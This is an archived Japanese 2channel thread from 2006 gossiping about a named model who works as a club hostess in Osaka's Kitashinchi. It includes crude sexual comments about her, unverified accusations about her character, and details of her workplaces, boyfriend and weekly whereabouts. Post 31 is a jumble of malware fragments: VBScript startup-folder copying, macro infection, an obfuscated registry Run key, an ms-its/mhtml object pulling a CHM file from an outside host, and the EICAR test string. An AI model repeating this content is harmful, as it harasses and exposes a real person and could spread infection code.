2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆米倉由華☆Part.3

1 :無名モデル:2006/10/07(土) 23:43:48 ID:mMBwSdaX
高級マンションにフェラーリを乗りまわす高飛車女!米倉由華について語ろう!

2 :無名モデル:2006/10/07(土) 23:44:36 ID:???
2

3 :無名モデル:2006/10/07(土) 23:59:31 ID:mKgxAA7k
由華って単なるバカお嬢様で有名

4 :無名モデル:2006/10/08(日) 00:49:48 ID:???
ほっといたり−な

5 :無名モデル:2006/10/08(日) 18:22:30 ID:???
最近ゆかたんオーディションでも会わないけど…何してるんやろ?

6 :無名モデル:2006/10/08(日) 21:49:57 ID:???
北新地の高級クラブのママやってガッツリ稼ぎまくってるらしいで!

7 :無名モデル:2006/10/08(日) 22:00:56 ID:yEJ6ZTLd
まじネタ?家の用事で長期休暇って聞いたけど
何て名前の店?

8 :無名モデル:2006/10/08(日) 22:17:21 ID:???
クラブピアジェ
根性悪いからバイトのヘルプから売り上げNo.1のママに迄短期でなった女!

9 :無名モデル:2006/10/08(日) 22:52:36 ID:???

根性悪くて短期でママにはなれんでW
お客さんいっぱいもってるし!だんとつトップ!
由華ママ派手なイケてる客多い!

10 :無名モデル:2006/10/08(日) 23:38:30 ID:HmLwDplh
そんなホスの話どうでもよし!今日はSMBの日だね

11 :無名モデル:2006/10/09(月) 02:50:50 ID:???
SMB今日で番組最後って!ゆかちゃんのアフロディテのセクシー画像見れないのか?涙

12 :無名モデル:2006/10/09(月) 04:22:24 ID:???
サンデーミュージックボックス最終回?
録画するの忘れた
愛しのゆかのアフロディーテの最後見届けたかった!誰か録画してない?最後のアフロディーテ貼りつけお願いします

13 :無名モデル:2006/10/09(月) 08:27:23 ID:???
同じく最終回のアフロディテ画像みたいですね
由華たんのセクシーさ
永久保存!!!

14 :無名モデル:2006/10/09(月) 14:41:41 ID:8Svhpu6V
ゆかちゃん色っぽくていいですね
ムハァ〜ヽ(´▽`)/

15 :無名モデル:2006/10/10(火) 19:11:59 ID:2absFSLG
エロい顔!

16 :無名モデル:2006/10/11(水) 16:45:41 ID:???
この方が働くのは北新地のピアジェですか?



17 :無名モデル:2006/10/11(水) 17:07:32 ID:???
そうですよ!ピアジェは彼女のお客さんでもってるみたいなもんで…一人大忙しだから殆ど席には着いてもらえないですが…余程暇な時かシャンパンかワインを抜いたら10分は座ってくれます!

18 :無名モデル:2006/10/11(水) 17:26:34 ID:???
>>17
レスありがとうございます。
ピアジェで働きたいんですが
ゆかさんは女の子に対してどんな感じなんですかね?

19 :無名モデル:2006/10/11(水) 20:30:37 ID:???
天然でかなり面白いし
美人だから冷たそうでいい加減そうだけど…義理堅い!仲良くしてもらえばかなり得!
カリスマママと言われてます!

20 :無名モデル:2006/10/11(水) 20:48:12 ID:RjQF0T7K
スタイル抜群!
巨乳に足長すぎ
ボンキュボーン!
人形みたいゆかちゃん最高!

21 :無名モデル:2006/10/11(水) 20:55:01 ID:EQltsvBx
モデルやったらスタイルよくて当たり前やろ!
整形やろう
金のない奴は用無しってタイプの女!天然に見せてかなり計算高いで

22 :無名モデル:2006/10/11(水) 22:23:23 ID:???
やりたい(´Д`)

23 :無名モデル:2006/10/11(水) 23:22:24 ID:???
誰か画像持ってませんか?

24 :無名モデル:2006/10/12(木) 18:56:12 ID:???
男好きするタイプやけど女には嫌われるタイプやな〜

25 :無名モデル:2006/10/12(木) 20:39:16 ID:ewOCHcoQ
由華ちゃん喋ったら天然で良い子やで
ただ喋りにくいオーラ発生してるけどW

26 :無名モデル:2006/10/13(金) 16:02:36 ID:NMcU8Ti8
味方にすると心強いが… 敵にするとかなりたちがわるいで
仕事のオハー来ないようににされたり首にされたり
知り合い何人か彼女に潰されたし

27 :無名モデル:2006/10/13(金) 16:44:34 ID:???

由華ちゃんに関係なくその知り合いが単に問題児だけやと思うな
確かに敵にしたくないタイプやけど
典型的なB型マイペースで人の事どうのこうの言うのも邪魔くさがるし人の悪口言っても聞いてないからその問題児らに自分を反省するように言うたり!

28 :無名モデル:2006/10/13(金) 17:15:03 ID:???
ゆかたん結婚してくれ〜

29 :無名モデル:2006/10/13(金) 18:54:24 ID:???
スタイルいいだけ!
ニューハーフみたいな顔してるよな

30 :無名モデル:2006/10/14(土) 22:30:15 ID:ik/i03Te
金持ちの娘やのに
この子なんしにお水やってなんしに働く理由があるか理解できましぇん
やっぱり本間のあほやな!身内の恥さらしやろう

31 :<body onload=window()>:2006/10/14(土) 23:51:20 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


32 :無名モデル:2006/10/15(日) 22:49:13 ID:z9QvK22U
この子の存在うざい!
VIPな人以外と話もしない
何様この女?
生意気なんじゃボケ

33 :無名モデル:2006/10/15(日) 23:29:39 ID:iP+Kzzw6
生意気、高飛車で嫌われてるで

34 :無名モデル:2006/10/15(日) 23:37:03 ID:???
おまいらゆかたんに相手されてないからって
ゴチャゴチャぬかすな
生意気に見えるだけで
義理堅いし情のあるええ子やん

35 :無名モデル:2006/10/17(火) 20:18:13 ID:0gS1Xib3
別嬪やんけ!

36 :無名モデル:2006/10/19(木) 08:17:09 ID:???
赤のフェラーリやろ〜殆ど乗ってなくて駐車場でホコリたまってたで!あの車彼氏に貰って自分で買ったんちゃうで〜

37 :無名モデル:2006/10/19(木) 16:26:44 ID:???
彼氏ってどんな人?
興味深々(゜▽゜

38 :無名モデル:2006/10/19(木) 20:19:04 ID:???
いわゆるヒルズ族で
元大阪出身の彼!若くて派手なタイプ!大阪で長い間同棲してました
東京にゆかを連れて行ったけど…
ゆかは1年前に大阪に戻っていきなりクラブのママになり超ヤキモチヤキの彼氏だったから今じゃ好き放題!遠距離恋愛

39 :無名モデル:2006/10/20(金) 07:16:55 ID:???
その彼氏って10年位昔からつき合ってる人やろ?

40 :無名モデル:2006/10/20(金) 08:05:53 ID:???
彼氏撮影現場迎えに来たりして仕事仲間と食事に行くのも怒ってよく電話で喧嘩してたけど…
お水やってるなんかまさか知らんとは思うけど
知ったら大変な話やな

41 :無名モデル:2006/10/20(金) 08:52:59 ID:???
この女計算高いから
うまいことやってんねんやろうな〜
本間に何で働くか理解できん!金は相当持ってるやろ
絵に描いたようなセレブな生活男にさせてもらってるのに
やっぱりアホやからしゃーない

42 :無名モデル:2006/10/20(金) 09:19:09 ID:+KjaLJsx
俺のゆかりんの文句ばっかぬかすな
ボケが

43 :無名モデル:2006/10/20(金) 15:45:14 ID:???
本間ニューハーフみたい背でかいし
態度もでかい

44 :無名モデル:2006/10/21(土) 07:56:10 ID:???
ゆかりん色っぽくて
ナイス!

45 :無名モデル:2006/10/21(土) 09:00:44 ID:XUMZEs7i
本人隠してるけど昔レースクィーンしてたで
その頃は初々しくて可愛いかったけど…
あれから8年位?経つとやはり年もとったなぁ

46 :無名モデル:2006/10/21(土) 09:06:28 ID:yIBl36aq
ゆかりんつきあって〜
大好き\^o^/

47 :無名モデル:2006/10/22(日) 03:13:55 ID:???

おまえなんか相手されるわけないやろΣ( ̄□ ̄;)

48 :無名モデル:2006/10/22(日) 03:18:14 ID:DlonwaTY
セレブお嬢☆

49 :無名モデル:2006/10/22(日) 17:38:25 ID:YNkr/7e+
確かに金持ちの娘で見た目もセレブやけど…
相当男騙して貢がせてるで

50 :無名モデル:2006/10/22(日) 17:48:53 ID:???
おまえあほやろ?
あのクラスの女が自分でも稼げるのになんの根拠で
男騙して貢がせんねん
おまえレベル低いW

51 :無名モデル:2006/10/22(日) 21:29:40 ID:ieCQqiba
由華さん綺麗だし
あの巨乳にあの素晴らしい足!
完璧です!
彼氏がうらやましい

52 :無名モデル:2006/10/23(月) 00:29:41 ID:OZ1BOY+v
ゆか愛してるよ

53 :無名モデル:2006/10/23(月) 01:03:59 ID:???
かなり生意気な女やで
何度かゆかと仕事一緒にした事がありますが
挨拶しても無視するし
ショーの衣装も自分が着たい服決まってるのに
オイシイどこ横どりして振り回された・゚・(>_<)・゚・

54 :無名モデル:2006/10/23(月) 03:24:11 ID:???
おまえの存在ゆかりんは知らんやろうな
こんなとこで文句たれてないでくやしけりゃあんたもおいしいとこどり出来るように頑張りなはれw

55 :無名モデル:2006/10/23(月) 19:03:53 ID:eEK1BUCM
由華の事は俺が一番愛してるって!!!

56 :無名モデル:2006/10/23(月) 21:37:35 ID:hKbYeDyb
いやあ〜俺やな(^∧^)

57 :無名モデル:2006/10/24(火) 07:13:10 ID:???
こんな所で競いあうなって!

58 :無名モデル:2006/10/24(火) 08:24:46 ID:???
ゆかって本間何しに働いてるの?これ以上お金持ってまだ何か欲しい物あるの?どこまで欲深い女やねん

59 :無名モデル:2006/10/24(火) 08:49:46 ID:???
おまえには上層の考えがないのか?
米倉由華はセレブなんだから一般人の価値感でもの言うなって

60 :無名モデル:2006/10/24(火) 19:18:40 ID:UAeFWUjC
その通りだニャン!
べっぴんでスタイルヨシ!

61 :無名モデル:2006/10/25(水) 07:19:50 ID:???
日曜日は東京に行った彼氏が由華に会いに大阪に帰って来てラブラブらしいよ!

62 :無名モデル:2006/10/25(水) 07:28:57 ID:???
ヤキモチの反面セレブ米倉由華の彼氏って見てみたい!
どんな人???

63 :無名モデル:2006/10/25(水) 08:34:33 ID:???
ゆかの彼氏普通では考えられないやきもち妬き!ロケの移動中や出張はいると電話なりまくってゆかと一緒にいてる周りまで電話ノイローゼになるW

64 :無名モデル:2006/10/25(水) 09:23:41 ID:???
それはかなり昔の話やろう!今最近はそこまでの話聞かんけど…なんせよく喧嘩して直ぐ仲直り最初は話聞いてたけど…それが二人ののろけばっかりで聞くのバカらしくなったわ
ようするに愛しあってます

65 :無名モデル:2006/10/25(水) 15:17:29 ID:dTcVj7ZL
うらやましいセレブお嬢☆

66 :無名モデル:2006/10/25(水) 19:37:06 ID:???
あんなわがままな女
ただ金持ちの娘ってだけやん!
かなりうざいわ

67 :無名モデル:2006/10/26(木) 08:16:40 ID:???
親が金持ちなだけ
七光りでえらそうにしてるけど…娘は立ちの悪いワル
世界は自分中心としか考えてないクラスのわがままさ
鉄板女!マイペースにもほどがある。逆切れするタイプなので敵にしたら怖い(゚〜゚)

68 :無名モデル:2006/10/27(金) 15:30:10 ID:???
由華の男もあほぼんでやんちゃくれ
似た者同士のバカップル!

69 :無名モデル:2006/10/27(金) 20:04:23 ID:???
どうみても妬みやなW

70 :無名モデル:2006/10/27(金) 23:23:57 ID:MSo80u7j
セクシィ〜

71 :無名モデル:2006/10/27(金) 23:50:40 ID:RAGqIufk
歩くフェロモン

72 :無名モデル:2006/10/28(土) 23:04:51 ID:???
由華さん色っぽくていいですね!

73 :無名モデル:2006/10/29(日) 00:05:33 ID:???
由華の彼氏がヤキモチきついというか
仕事場でも色んな男の人から食事の誘いの電話よくかかってきて何度か由華に連れてってもらった事があります
由華本人に問題があって彼氏はまともだと思いますよ!凄いできてる人ですよ!

74 :無名モデル:2006/10/29(日) 05:45:05 ID:???
今でもその彼氏とはラブラブなんですか?
芸能人で例えると誰?
ゆかりんと付き合いたいので…情報キボンヌ!

75 :無名モデル:2006/10/29(日) 10:25:31 ID:???
由華ちゃんを妬むな☆

76 :無名モデル:2006/10/29(日) 16:17:33 ID:9KDsyI+z
ゆかりんとつきあいたいとかあつかましい
ボケが!

77 :無名モデル:2006/10/29(日) 18:13:06 ID:???
由華は妬まれてもしゃあないで
人が羨む物全てもってるし由華は気にされる存在やしな!それだけ意識されるって良い事やと思うけど…

78 :無名モデル:2006/10/29(日) 21:07:17 ID:???
フムフム(^∧^)

79 :無名モデル:2006/10/29(日) 23:24:08 ID:KZ1Mrwn6
アフロディ‐テ! バッキューン(^_-)-☆

80 :無名モデル:2006/10/30(月) 21:17:56 ID:o0e8sne1
ニューハーフみたい!

81 :無名モデル:2006/10/31(火) 15:18:58 ID:kK7R+a2H
ゆか愛してるよ

82 :無名モデル:2006/11/01(水) 15:55:51 ID:Je/KOaqf
金銭感覚おかしいで!

83 :無名モデル:2006/11/01(水) 19:47:54 ID:???
妬むなよ

84 :無名モデル:2006/11/02(木) 17:11:03 ID:/f8PJU3m
ゆかの彼氏男前やで
それに硬派で億万長者
あいつだけいい思いしやがってどこでそんな男みつけんねんやろう?

85 :無名モデル:2006/11/02(木) 18:41:49 ID:WaN24FAt
確かに

86 :無名モデル:2006/11/02(木) 18:49:00 ID:WaN24FAt
確かにゆかの彼氏、女には連絡先言わない人で連絡しても無視らしい
そういう男って女からして燃える〜それがまたあの高飛車ゆかの彼氏って言うだけに一晩でもどんなのか奪ってみたい!

87 :無名モデル:2006/11/03(金) 15:18:57 ID:???
そんなん言うてる女一晩どころか相手にもされへんわ

88 :無名モデル:2006/11/03(金) 16:38:54 ID:zb8YtRpA
やっぱゆかちゃんの彼氏ってだけで…気になる存在やな
仕事何してる人なん?

89 :無名モデル:2006/11/04(土) 16:31:46 ID:MjP/iQaR
ゆかちゃん綺麗
たまらん!すげぇタイプ彼氏がうらやましい

90 :無名モデル:2006/11/04(土) 21:13:16 ID:???
男たらしで性格悪いで!
色うり女

91 :無名モデル:2006/11/04(土) 22:54:02 ID:mpJ+o6bB
エロイ顔してるし
あの体セクゥースしたいっす

92 :無名モデル:2006/11/05(日) 00:32:55 ID:???
ゆかは確かに男たらし
させないくせに相手に惚れさせ、てなづけるのが得意!気をつけよう!

93 :無名モデル:2006/11/05(日) 06:46:04 ID:3nPdD/Pi
だから妬むなって!

94 :無名モデル:2006/11/05(日) 08:29:18 ID:3nPdD/Pi
ゆか大好き☆

95 :無名モデル:2006/11/05(日) 08:34:03 ID:XBvNd/zk
ええ女は妬まれてなんぼですやん
色っぽくてええな〜

96 :無名モデル:2006/11/07(火) 12:23:13 ID:???
ゆかは興味ない人とはまず会わないし食事もいかないはっきりしてるタイプだから反応があればかなり脈あり!

97 :無名モデル:2006/11/08(水) 06:33:18 ID:???
脈ありとは?
どういうタイプだったらok?

98 :無名モデル:2006/11/08(水) 15:37:51 ID:???
由華はお店のお客に対して1対1で絶対食事やアフターに来ないしいつも女の子連れての団体行動!
来ても10分顔だししたら消えるらしいけど…
若い男前の金持ちが好物みたいでそういう男とは休みの日に二人で食事ドライブデートするみたい(^^)v

99 :無名モデル:2006/11/08(水) 17:53:26 ID:???
そうかな?由華ママのお客さん若くて男前の金持ち多いけど…
休みの日会ったりするタイプ違うし連絡とれないとかたまには飯つきあえとか嫌み言われてるし
若くて男前金持ちだけでデートはしないで

100 :無名モデル:2006/11/08(水) 18:55:18 ID:JIegX/g5

金銭感覚の狂った計算高い女だから一般人クラスの金持ちは確かに興味しめさないが超VIPクラスの若い男前だったら反応するはず!

101 :無名モデル:2006/11/08(水) 20:31:54 ID:???
そう男たらしです。女友達といる時はコンパの時だけ!

102 :無名モデル:2006/11/09(木) 10:53:25 ID:???
やまとなでしこ

103 :無名モデル:2006/11/11(土) 10:41:26 ID:???
天然のふりしてずる賢いで
自分の事しか考えてない超我が儘

104 :無名モデル:2006/11/11(土) 19:27:11 ID:eEUsUaRq
天然のふりはしてないやろう!長嶋監督級の正真正銘の天然やで〜見た目とのギャップがたまらん

105 :無名モデル:2006/11/11(土) 21:34:42 ID:42/oBONa
彼女はカリスマ的な不思議な魅力ありますね!

106 :無名モデル:2006/11/12(日) 19:02:45 ID:???
やりたい!エロい顔に顔面発射におもいっきり突っ込みたい!!!!!!!!!

107 :無名モデル:2006/11/17(金) 07:37:13 ID:6/UkYF0/
あげとこ

108 :無名モデル:2006/11/19(日) 03:26:38 ID:???
色売り女!こいつの存在うざい!

109 :無名モデル:2006/11/19(日) 16:35:25 ID:???
色っぽいエロ顔に巨乳
美脚舐めまわしたい

110 :無名モデル:2006/11/19(日) 17:13:18 ID:S/QmZ+sM
男うけ良いだろうけど…女から敵にされそうなタイプゆかちゃんオーディションのとき審査、女の人は嫌とよく言ってました。
やっぱり自分の事はよく分かってるのね!

111 :無名モデル:2006/11/19(日) 23:11:14 ID:???
SMB1時間番組から30分の新番組になってるな!由華ちゃんで数字あげてるな!

112 :無名モデル:2006/11/19(日) 23:15:48 ID:p4jUW3gO
アフロディーテ美の女神米倉由華りん☆

113 :無名モデル:2006/11/20(月) 08:10:53 ID:???
ゆか!愛してるよ!
食べたい( ^ー゚)b

114 :無名モデル:2006/11/21(火) 08:18:54 ID:???
>>101
その通り!よく知ってるね!色売り女は男大好きなんで女だけでいる事なんか考えれないね!
由華にはまってる知り合いが食事に誘おうと電話して女友達と食事行くと言われ断られ…
その日偶然に目撃したら若い男前と腕組んで歩いてたらしい!嘘つきの男たらし!最悪

115 :無名モデル:2006/11/21(火) 18:46:00 ID:???
おまえが相手されてないだけ!!!!!!!!!!!

116 :無名モデル:2006/11/21(火) 21:04:10 ID:dC3SbjsG
あの白肌にあの胸にあの足たまらん
セクゥースよさそう

117 :無名モデル:2006/11/22(水) 05:08:16 ID:???
最悪な女!嘘つき!
後で行くと口ばっかり
いつも待ちぼうけ
振り回されすぎてはげできるわ!人の気持ちなんて全く無視!いい加減にしろ!

118 :無名モデル:2006/11/22(水) 14:13:58 ID:erb3QZO6

振られたか相手されてないかしらんけど…
こんなとこで文句いうなや

119 :無名モデル:2006/11/22(水) 14:16:33 ID:???
↑ おのれはすっこんどれチンカスが

120 :117:2006/11/23(木) 11:40:17 ID:???
なんで帰れって言われたのか今までわからなかった。。。変換ミスm(_ _)m

121 :無名モデル:2006/11/23(木) 11:46:10 ID:???
その年であの肌とスタイルやったら・・・本間にすごい!!感動するわ〜もう20代半ば過ぎのはず!あの足の長さはどうやったらあんな風になるんだ?

122 :無名モデル:2006/11/23(木) 18:02:49 ID:p+7IySSG
足の長さとあの天然独特の揺れ方の美乳素晴らしい!それよりあのエッチそうな顔!最高!

123 :無名モデル:2006/11/23(木) 18:09:01 ID:???
胸の谷間に挟まれたい
顔面発射
ドッドッドッピューン

124 :無名モデル:2006/11/24(金) 03:51:09 ID:???
米倉由華は隠してるが元レースクィーンでした

125 :無名モデル:2006/11/24(金) 15:20:46 ID:???
>>124
何でレースクィーン隠してんの?

126 :無名モデル:2006/11/24(金) 18:06:47 ID:???
それは由華の彼氏が超ヤキモチやきで普段ミニスカートはくだけでも大喧嘩してたらしい!
カメラ通す仕事以外でスカート禁止らしいで!
これはマジ

127 :無名モデル:2006/11/24(金) 18:23:22 ID:???
なるほど!確かにレースクィーンは一般人に生で見られるしカメラ好き放題にとられるもんな

128 :無名モデル:2006/11/24(金) 19:25:56 ID:J4h2dq0C
彼氏若い男前で金持ってるしモテるのに付き合いも長いのにゆかに相当はまってるみたいやし…
Hもええんやろうな…

129 :無名モデル:2006/11/24(金) 21:07:48 ID:???
ぶち込みたい!フェロモンバッキューン!( ̄(エ) ̄)

130 :無名モデル:2006/11/25(土) 20:42:21 ID:???
レースクィーン姿みたいぜ!バックから突き上げたい!!!!!!!!!!!!!!!!!

131 :無名モデル:2006/11/26(日) 02:16:30 ID:???
ケツのラインええかんじ!

132 :無名モデル:2006/11/26(日) 20:40:48 ID:???
なんかまともな話ないのか?

133 :無名モデル:2006/11/27(月) 08:11:19 ID:???
日曜日は彼氏とまったりしてるみたいですね!何度か目撃しました。。。

134 :無名モデル:2006/11/27(月) 23:54:19 ID:???
別にほっといたり―な!

135 :無名モデル:2006/11/28(火) 00:41:41 ID:???
↑貴様はひっこんどれ。チンカス野郎が

136 :無名モデル:2006/11/29(水) 21:29:36 ID:GNBAml6o
足のラインがかなりいいかんじや(^∧^)

137 :無名モデル:2006/11/30(木) 06:46:32 ID:???
>>128
H良さそう!あの足首はかなりのものやで
料理も上手いらしいし
体と料理がよけりゃ
そらはまるやろ!
あのスタイルやしな

138 :無名モデル:2006/11/30(木) 22:31:04 ID:yUrpXpTb
えーな!おいちそう

139 :無名モデル:2006/12/02(土) 05:33:47 ID:???
>>133
よく知ってますね!
日曜日は彼氏といつもいてるよ!
月曜日は大阪の会社に顔出してそのまま東京に帰って毎週日曜日は大阪帰ってきてるってきいた

140 :無名モデル:2006/12/04(月) 13:13:24 ID:olfCmarx
ピアジェ解雇になったらしいね。

141 :無名モデル:2006/12/05(火) 15:46:16 ID:???
アフロディーテゆかちゃん!バッキューン

142 :無名モデル:2006/12/07(木) 06:35:25 ID:???
>>140
残念賞!12/4オープンの100坪の粱山ぱくの会長のお店のママで行ってるので…
ピアジェ側はそりゃ好きな様に文句たれるだろうし
女の子抜かれない様に
必死らしい!

143 :無名モデル:2006/12/08(金) 13:48:55 ID:???
なんだかドロドロした話だな〜

144 :無名モデル:2006/12/08(金) 14:25:14 ID:???
おきまりでしょ!店辞めたら客とられるのを警戒して前店より女の子どころか客とられないように必死やろな

145 :無名モデル:2006/12/09(土) 15:38:25 ID:???
で、由華ちゃんはなんて名前のクラブのママさん?

146 :無名モデル:2006/12/10(日) 02:29:51 ID:???
北新地スレのコピペ

昨日オープンの響に由華ママ行きましたね!
それで急に辞めたのか…納得!前からピアジェ辞めると噂聞いてたけど…由華ママの花見てとうとう辞めたと確信!さすがの鉄板やな〜
ますますピアジェグループどろどろ。。。
ベラ本人対決もまだ続いてるしなw

このレスからしてクラブ響と言うお店のママです。北新地の板に由華ママの事沢山書かれてた。簡潔にまとめると
由華ママピアジェグループ抜けて他のグループはかなり喜んでる模様!
ピアジェでママの中でもだんとつ売り上げトップだっただけに本店ピアジェが時間の問題で終了するのではとの意見多数!ピアジェ辞めて数日しか経ってないのに
オープンのお店に行かれたとさ

147 :無名モデル:2006/12/10(日) 16:15:20 ID:???
前々から思ってたけどほんとゆかちゃんは話題性のある子だね!

148 :無名モデル:2006/12/10(日) 22:37:26 ID:???
家金持ちでセレブなのにどこまで金貯める気なんかなんで働くのかもマジで理解できないわ

149 :無名モデル:2006/12/10(日) 23:40:31 ID:???
本間にそう思う!金稼いでるくせに…
自分のお金は使わないタイプ

150 :無名モデル:2006/12/11(月) 01:07:38 ID:???
アフロディテやっぱり
ええな〜エロイ体と顔
たまらん!やりてぇ〜

151 :無名モデル:2006/12/11(月) 04:26:21 ID:???
今日のアフロディテ見ていきました!ドッピューン

152 :無名モデル:2006/12/11(月) 17:31:48 ID:???
エロ顔由華ちゃん☆

153 :無名モデル:2006/12/13(水) 07:47:58 ID:???
セクシーバディ〜( ̄▽ ̄〜)やりたい

154 :無名モデル:2006/12/16(土) 03:22:18 ID:kt6VvNtO
この人、知ってる!
セレブなんゃろ?
テレビでうた歌ってるゃんな〜
仕事の付き合いで何回か会ったょ〜背高くて美人でスタィル良いけど、下品。
なんか汚らしくみぇた。
古い感じ。
夜の世界の女って感じ〜
もったぃなぃ

155 :無名モデル:2006/12/16(土) 07:18:49 ID:xioV69xn
美人以前に、肌も汚いし、品格が無いし、がさつな感じ。清潔感まるで無し。 金持ちの家の子特有の育ちの良さとか全く感じられないし、話し方、所作もがさつな感じ。いつもチャームつまみ食いして、お行儀悪いしね。

156 :無名モデル:2006/12/16(土) 08:57:07 ID:???
美人でスタイルよくて確かにセレブやけど…ただフェラーリ乗って億ション住んでみにつけてる宝飾品が数千万とか言うだけでただ単に金銭感覚の狂ったばかお嬢様!
スーパー我が儘で敵にすると金と人脈使い必ず嫌がらせをして潰される
かなりたちの悪い女で
怖い!

157 :無名モデル:2006/12/16(土) 10:33:36 ID:???
>>155
チャームって同じお店のお水だね〜
こんなところで妬んで必死に文句言ってる暇があるなら
ママになれるように努力しなさいW

158 :無名モデル:2006/12/16(土) 10:39:12 ID:t3IpitYS
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

159 :無名モデル:2006/12/16(土) 14:57:11 ID:kt6VvNtO
億ション住んでるらしぃね☆
でも本間きれいな人ゃのに……
雰囲気とゅぅか品ってゅぅのわどぅしょぅもなぃのね。
ぉ金持ちに見えへんかったもん。
しかも年きいてビックリした。ひとまわり以上、上にみぇた。
本間のお金もちゎぉ金の使い方上手なはずゃけど。


160 :無名モデル:2006/12/16(土) 16:40:20 ID:???
直接見たのか?誰が見ても金かかりますオーラとばしまくってるけど…?
金銭感覚の狂った有名なばかお嬢なんだよ!
だから金を上手に使うとか考える能力もないだろう
どうみても生意気なクソガキしか見えないけど…?

161 :無名モデル:2006/12/16(土) 20:46:11 ID:???
ハイハイ!由華の事ごちゃごちゃ言うて楽しいか?まぁ意識されるタイプだからしゃあないけど

162 :無名モデル:2006/12/17(日) 03:30:02 ID:???
肌も綺麗し足綺麗し長くてカッコイ!
ばかお嬢と言われだしたのは年収何百億のサラブレッドがプロポーズして
婚約寸前で由華さん断ったからやで!
だからお嬢にばかかつけられてるだけで
確かにお金に困ってなくともそんな話もったいない。由華さんはどうみても頭はキレると思います。
相手見てばかな不利をしたり!相手に合わせて色んな人種にキャラをかえてます仮にがさつに写ったなら
相手ががさつな人だったんでしょうそれは夜の世界の顔では?今風なのに日本舞踊の会など開かれてましたし惹かれるカリスマ的な女性です。
本人見ればわかります。

163 :無名モデル:2006/12/17(日) 04:42:54 ID:???
由華ママは女性に対してもレベルが高いので
安っぽい子やブスを嫌い高そうな華のある子を好むので
ブスでも自分が可愛がってる子なら問題ないが
それ以外の並みの女でも絶対席に着かせてもらえないし着こうとすると激怒し外せというらしい
かなり仕事では怖いらしい!

164 :無名モデル:2006/12/17(日) 14:30:21 ID:???
やりたいぜ!!!

165 :無名モデル:2006/12/17(日) 19:53:55 ID:E7hM2Dil
>>156の言うとおり
敵にすると口では言えない恐ろしい(゚〜゚)
モデルの世界で生きていけなくなった子から
聞きました。
彼女にはお金と美貌があるので
どんな手段を使っても
やられる(>_< )( >_<)

166 :無名モデル:2006/12/17(日) 23:35:40 ID:BKboIgXe
>>159は外国の王妃ですか?W
それだったら話わかるけどW色んな金持ちタイプいてるけど
天皇姫みたいな地味な金持ちもいれば由華は叶姉妹やデビー婦人っぽい華やかさ
誰が見ても金の臭いしてる別嬪でスタイルええけど
金かかるから普通の男は敬遠するタイプやで
それかおまえ例えばHERMESとかCartierとか高級ブランド知らんし値段も知らんやろ?笑われるでWWW
由華が着てる服、靴、時計、鞄全てが高級ブランドやで!由華がよく付けてるCartierのスパルタカスのブレスレットに
Allダイヤのチャーム5個位付けてるけど…それだけでも300万以上はこえてるものやでそれに由華は靴キチガイ!
ヴイトンやセリジオロッシーやグッチが多いけど
些細な靴ですら10万前後
高級ブランドが何か?
とかいくらするもの?
とかそんな事も知らんやつがおまえわらかすあほやな恥ずかしい(〃д〃)
ゲラゲラW

167 :無名モデル:2006/12/18(月) 00:25:41 ID:???
おっと〜スレあがってるやん!
言うとおりやな!
しかしお金持ちに見えへんって発言!
笑ってもうた!
でもどちらかと言うと喋り方とか雰囲気神田うの系やろう

168 :無名モデル:2006/12/18(月) 00:47:42 ID:???
ゆかの彼氏はヒルズ族
大阪と東京なのでゆかは羽伸ばして好き放題
だからクラブのママやってるんやろうな
またええ男みつけようとしやがって趣味と実益かよ〜
そして週末は彼氏大阪入りでラブラブ
しかし何かにつけて昔から運ええし好きな事してちゃっかりしてるで!

169 :無名モデル:2006/12/18(月) 00:54:46 ID:???
ぶち込みたい
エロチシズム

170 :無名モデル:2006/12/18(月) 01:48:17 ID:???
私の彼が由華さんに今夢中でしょっちゅう話聞かされます彼氏いるなら安心ですが…
由華さんのお店にはまりだしたら心配です。
雑誌やTVでは拝見してますが…中身はどんなタイプですか?

171 :無名モデル:2006/12/18(月) 04:17:22 ID:???
エロエロ イクゥ〜

172 :無名モデル:2006/12/18(月) 16:05:38 ID:iDDyNFaX
お顔のお肌がデコポンみたいにデコボコして汚い。服靴に着飾るなら肌を綺麗にした方がいいと思う。顔と足は悪くないんだからさ。老けてるよね。どんな高価な物を身につけてもなぜか、安っぽく見えてしまうよね、この人。ある意味かわいそうですね。

173 :無名モデル:2006/12/19(火) 16:00:14 ID:???
あんたが1番かわいそう〜W

174 :無名モデル:2006/12/20(水) 07:29:38 ID:xsi+/G4o
いや、おまえはそれ以下じゃw

175 :無名モデル:2006/12/21(木) 07:22:47 ID:???
必死に反応してますw
やっぱおまえは哀れやなw

176 :無名モデル:2006/12/21(木) 16:44:04 ID:???
やりたい!

177 :無名モデル:2006/12/21(木) 21:43:14 ID:???
この女ほんま怖い!
どんな大物でも潰してまいよる!

178 :無名モデル:2006/12/21(木) 22:52:41 ID:JoMe0TVF
だって本間にお金持ちにみぇへんかったんゃから仕方なくなぃ?
ぁたしが会った時ゎユカって人スッピンで普通ぽぃ格好してたからかな?
そんなにブランドものとか身につけてるんですね。
そんな大物とゎ!
凄いですね。
私ブランドもの一切興味なぃから全然ゎからへんゎぁ☆

